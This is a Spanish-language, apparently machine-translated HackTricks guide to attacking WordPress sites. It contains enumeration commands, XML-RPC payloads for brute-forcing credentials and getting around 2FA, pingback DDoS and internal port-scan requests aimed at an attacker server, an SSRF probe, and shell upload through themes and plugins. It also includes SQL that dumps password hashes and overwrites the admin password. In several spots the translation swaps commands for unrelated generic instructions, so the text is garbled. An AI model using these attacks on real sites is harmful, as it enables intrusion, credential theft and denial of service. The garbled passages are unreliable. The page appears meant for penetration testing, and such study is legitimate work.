24 KiB
Wordpress
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el swag oficial de PEASS & HackTricks
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
Usa Trickest para construir y automatizar flujos de trabajo con las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Información básica
Los archivos subidos se guardan en: http://10.10.10.10/wp-content/uploads/2018/08/a.txt
Los archivos de temas se pueden encontrar en /wp-content/themes/, por lo que si cambias algún archivo php del tema para obtener RCE, probablemente utilizarás esa ruta. Por ejemplo: Usando el tema twentytwelve puedes acceder al archivo 404.php en: /wp-content/themes/twentytwelve/404.php
Otra URL útil podría ser: /wp-content/themes/default/404.php
En wp-config.php puedes encontrar la contraseña raíz de la base de datos.
Rutas de inicio de sesión predeterminadas para verificar: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Archivos principales de WordPress
index.php
license.txt
contiene información útil como la versión de WordPress instalada.wp-activate.php
se utiliza para el proceso de activación por correo electrónico al configurar un nuevo sitio de WordPress.- Carpetas de inicio de sesión (pueden tener otro nombre para ocultarlas):
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
es un archivo que representa una característica de WordPress que permite transmitir datos con HTTP actuando como mecanismo de transporte y XML como mecanismo de codificación. Este tipo de comunicación ha sido reemplazado por la API REST de WordPress.- La carpeta
wp-content
es el directorio principal donde se almacenan los complementos y temas. wp-content/uploads/
es el directorio donde se almacenan los archivos cargados en la plataforma.wp-includes/
es el directorio donde se almacenan los archivos principales, como certificados, fuentes, archivos JavaScript y widgets.
Explotación posterior
- El archivo
wp-config.php
contiene información requerida por WordPress para conectarse a la base de datos, como el nombre de la base de datos, el host de la base de datos, el nombre de usuario y la contraseña, las claves de autenticación y las sales, y el prefijo de la tabla de la base de datos. Este archivo de configuración también se puede utilizar para activar el modo DEBUG, que puede ser útil para solucionar problemas.
Permisos de usuarios
- Administrador
- Editor: Publica y gestiona sus propias publicaciones y las de otros.
- Autor: Publica y gestiona sus propias publicaciones.
- Colaborador: Escribe y gestiona sus publicaciones, pero no puede publicarlas.
- Suscriptor: Navega por las publicaciones y edita su perfil.
Enumeración pasiva
Obtener la versión de WordPress
Comprueba si puedes encontrar los archivos /license.txt
o /readme.html
Dentro del código fuente de la página (ejemplo de https://wordpress.org/support/article/pages/):
- grep
curl https://victim.com/ | grep 'content="WordPress'
meta name
- Archivos de enlace CSS
- Archivos de JavaScript
Obtener Plugins
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Obtener Temas
Para obtener temas de WordPress, puedes seguir estos pasos:
- Visita el sitio web oficial de WordPress en wordpress.org/themes.
- Explora la amplia colección de temas disponibles y elige el que más te guste.
- Haz clic en el botón "Descargar" para obtener el archivo del tema en formato ZIP.
- Una vez descargado, descomprime el archivo ZIP en tu computadora.
- Accede a tu sitio web de WordPress y ve al panel de administración.
- En el menú lateral, selecciona "Apariencia" y luego "Temas".
- Haz clic en el botón "Agregar nuevo" en la parte superior de la página.
- Selecciona la opción "Subir tema" y elige el archivo ZIP que descomprimiste anteriormente.
- Haz clic en el botón "Instalar ahora" y espera a que se complete el proceso de instalación.
- Una vez instalado, podrás activar el tema y personalizarlo según tus preferencias.
¡Ahora puedes disfrutar de tu nuevo tema de WordPress en tu sitio web!
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Extraer versiones en general
Para obtener información sobre las versiones de WordPress y los complementos instalados en un sitio web, se pueden utilizar varias técnicas:
-
Exploración de directorios: Al explorar los directorios del sitio web, se pueden encontrar archivos que revelen información sobre las versiones utilizadas. Por ejemplo, los archivos readme.html o readme.txt pueden contener detalles sobre la versión de WordPress.
-
Exploración de metadatos: Al examinar el código fuente de las páginas web, se pueden encontrar metadatos que indiquen la versión de WordPress o de los complementos utilizados. Esto se puede hacer inspeccionando el código HTML o buscando en los archivos CSS o JavaScript.
-
Búsqueda de archivos de configuración: Al buscar archivos de configuración específicos de WordPress, como wp-config.php, se pueden obtener detalles sobre la versión de WordPress y las credenciales de la base de datos.
-
Utilización de herramientas automatizadas: Existen herramientas de escaneo automatizado, como WPScan, que pueden identificar las versiones de WordPress y los complementos instalados en un sitio web.
Es importante tener en cuenta que la divulgación de versiones puede ser útil tanto para los administradores del sitio web como para los atacantes. Los administradores pueden utilizar esta información para mantener sus sitios actualizados y protegidos, mientras que los atacantes pueden aprovechar las vulnerabilidades conocidas en versiones antiguas para comprometer un sitio web. Por lo tanto, es fundamental mantener siempre actualizado el software utilizado en un sitio web.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Utiliza Trickest para construir y automatizar fácilmente flujos de trabajo impulsados por las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Enumeración activa
Plugins y temas
Probablemente no podrás encontrar todos los Plugins y Temas posibles. Para descubrir todos ellos, deberás realizar un ataque de fuerza bruta activo a una lista de Plugins y Temas (afortunadamente, existen herramientas automatizadas que contienen estas listas).
Usuarios
Fuerza bruta de ID
Puedes obtener usuarios válidos de un sitio de WordPress mediante la fuerza bruta de los IDs de usuarios:
curl -s -I -X GET http://blog.example.com/?author=1
Si las respuestas son 200 o 30X, eso significa que el id es válido. Si la respuesta es 400, entonces el id es inválido.
wp-json
También puedes intentar obtener información sobre los usuarios haciendo consultas:
curl http://blog.example.com/wp-json/wp/v2/users
Solo se proporcionará información sobre los usuarios que tengan esta función habilitada.
También ten en cuenta que /wp-json/wp/v2/pages podría filtrar direcciones IP.
Enumeración de nombres de usuario de inicio de sesión
Cuando inicias sesión en /wp-login.php
, el mensaje es diferente si el nombre de usuario indicado existe o no.
XML-RPC
Si xml-rpc.php
está activo, puedes realizar un ataque de fuerza bruta de credenciales o usarlo para lanzar ataques de denegación de servicio (puedes automatizar este proceso usando esto, por ejemplo).
Para ver si está activo, intenta acceder a /xmlrpc.php y envía esta solicitud:
Comprobar
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Fuerza bruta de credenciales
wp.getUserBlogs
, wp.getCategories
o metaWeblog.getUsersBlogs
son algunos de los métodos que se pueden utilizar para realizar una fuerza bruta de credenciales. Si puedes encontrar alguno de ellos, puedes enviar algo como:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
El mensaje "Nombre de usuario o contraseña incorrectos" debe aparecer dentro de una respuesta de código 200 si las credenciales no son válidas.
Usando las credenciales correctas, puedes subir un archivo. En la respuesta, aparecerá la ruta (https://gist.github.com/georgestephanis/5681982)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
También hay una forma más rápida de forzar credenciales utilizando system.multicall
ya que puedes probar varias credenciales en la misma solicitud:
Bypass 2FA
Este método está destinado a programas y no a humanos, y es antiguo, por lo tanto no admite 2FA. Entonces, si tienes credenciales válidas pero la entrada principal está protegida por 2FA, es posible que puedas abusar de xmlrpc.php para iniciar sesión con esas credenciales evitando el 2FA. Ten en cuenta que no podrás realizar todas las acciones que puedes hacer a través de la consola, pero aún podrías lograr RCE como lo explica Ippsec en https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s
DDoS o escaneo de puertos
Si puedes encontrar el método pingback.ping en la lista, puedes hacer que Wordpress envíe una solicitud arbitraria a cualquier host/puerto.
Esto se puede utilizar para pedirle a miles de sitios de Wordpress que accedan a una ubicación (causando un DDoS en esa ubicación) o puedes usarlo para hacer que Wordpress escanee alguna red interna (puedes indicar cualquier puerto).
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Si obtienes faultCode con un valor mayor que 0 (17), significa que el puerto está abierto.
Echa un vistazo al uso de system.multicall
en la sección anterior para aprender cómo abusar de este método para causar un DDoS.
DDoS
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
wp-cron.php DoS
Este archivo generalmente se encuentra en la raíz del sitio de Wordpress: /wp-cron.php
Cuando se accede a este archivo, se realiza una consulta MySQL "pesada", por lo que podría ser utilizado por atacantes para causar un DoS.
Además, de forma predeterminada, el wp-cron.php
se llama en cada carga de página (cada vez que un cliente solicita cualquier página de Wordpress), lo cual puede causar problemas en sitios con mucho tráfico (DoS).
Se recomienda desactivar Wp-Cron y crear una tarea cron real dentro del host que realice las acciones necesarias en un intervalo regular (sin causar problemas).
/wp-json/oembed/1.0/proxy - SSRF
Intenta acceder a https://sitio-de-wordpress.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net y el sitio de Wordpress puede hacer una solicitud hacia ti.
Esta es la respuesta cuando no funciona:
SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
Esta herramienta verifica si el methodName: pingback.ping y la ruta /wp-json/oembed/1.0/proxy existen, y si es así, intenta explotarlos.
Herramientas Automáticas
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
Utiliza Trickest para construir y automatizar fácilmente flujos de trabajo impulsados por las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Obtén acceso sobrescribiendo un bit
Más que un ataque real, esto es una curiosidad. En el CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man puedes cambiar 1 bit de cualquier archivo de WordPress. Por lo tanto, puedes cambiar la posición 5389
del archivo /var/www/html/wp-includes/user.php
para anular la operación NOT (!
).
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
Panel RCE
Modificando un archivo php del tema utilizado (se necesitan credenciales de administrador)
Apariencia → Editor de temas → Plantilla 404 (a la derecha)
Cambie el contenido por una shell php:
Busque en internet cómo puede acceder a esa página actualizada. En este caso, debe acceder aquí: http://10.11.1.234/wp-content/themes/twentytwelve/404.php
MSF
Puede usar:
use exploit/unix/webapp/wp_admin_shell_upload
Plugin RCE
Plugin PHP
Es posible subir archivos .php como un plugin.
Crea tu puerta trasera php usando, por ejemplo:
Luego agrega un nuevo plugin:
Sube el plugin y presiona Instalar Ahora:
Haz clic en Proceder:
Probablemente esto no haga nada aparentemente, pero si vas a Media, verás tu shell subida:
Accede a ella y verás la URL para ejecutar el reverse shell:
Subir y activar un plugin malicioso
(Esta parte está copiada de https://www.hackingarticles.in/wordpress-reverse-shell/)
A veces, los usuarios con sesión iniciada no tienen autorización de escritura para realizar modificaciones en el tema de WordPress, por lo que elegimos "Inyectar plugin malicioso de WP" como una estrategia alternativa para obtener una web shell.
Entonces, una vez que tienes acceso a un panel de WordPress, puedes intentar instalar un plugin malicioso. Aquí ya he descargado el plugin vulnerable de exploit db.
Haz clic aquí para descargar el plugin para practicar.
Dado que tenemos el archivo zip del plugin, ahora es el momento de subir el plugin.
Panel > plugins > subir plugin
Busca el archivo zip descargado como se muestra.
Una vez que el paquete se instale correctamente, debemos activar el plugin.
Cuando todo esté bien configurado, procede a explotar. Dado que hemos instalado un plugin vulnerable llamado "reflex-gallery" y es fácilmente explotable.
Obtendrás el exploit para esta vulnerabilidad dentro del framework Metasploit y, por lo tanto, carga el siguiente módulo y ejecuta el siguiente comando:
Una vez que se ejecuten los comandos anteriores, tendrás tu sesión de meterpreter. Tal como se muestra en este artículo, hay múltiples métodos para explotar un sitio web basado en WordPress.
Post Explotación
Extraer nombres de usuario y contraseñas:
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
Cambiar contraseña de administrador:
Para cambiar la contraseña de administrador en WordPress, sigue estos pasos:
- Inicia sesión en el panel de administración de WordPress con tus credenciales de administrador.
- En el menú lateral, selecciona "Usuarios" y luego "Todos los usuarios".
- Haz clic en el usuario "admin" para editar su perfil.
- Desplázate hacia abajo hasta la sección "Cambiar contraseña".
- Haz clic en el enlace "Generar contraseña" para que WordPress genere una contraseña segura automáticamente. Si prefieres establecer tu propia contraseña, puedes hacerlo marcando la casilla "Ocultar" y escribiendo la contraseña deseada.
- Haz clic en el botón "Actualizar perfil" para guardar los cambios.
¡Listo! Ahora has cambiado la contraseña de administrador en WordPress. Asegúrate de recordar la nueva contraseña y mantenerla segura.
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
Protección de WordPress
Actualizaciones regulares
Asegúrese de que WordPress, los complementos y los temas estén actualizados. También confirme que la actualización automática está habilitada en wp-config.php:
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
También, solo instala plugins y temas de WordPress confiables.
Plugins de seguridad
Otras recomendaciones
- Elimina el usuario admin predeterminado
- Utiliza contraseñas fuertes y 2FA
- Revisa periódicamente los permisos de los usuarios
- Limita los intentos de inicio de sesión para prevenir ataques de fuerza bruta
- Renombra el archivo
wp-admin.php
y solo permite el acceso interno o desde ciertas direcciones IP.
Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy mismo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el swag oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.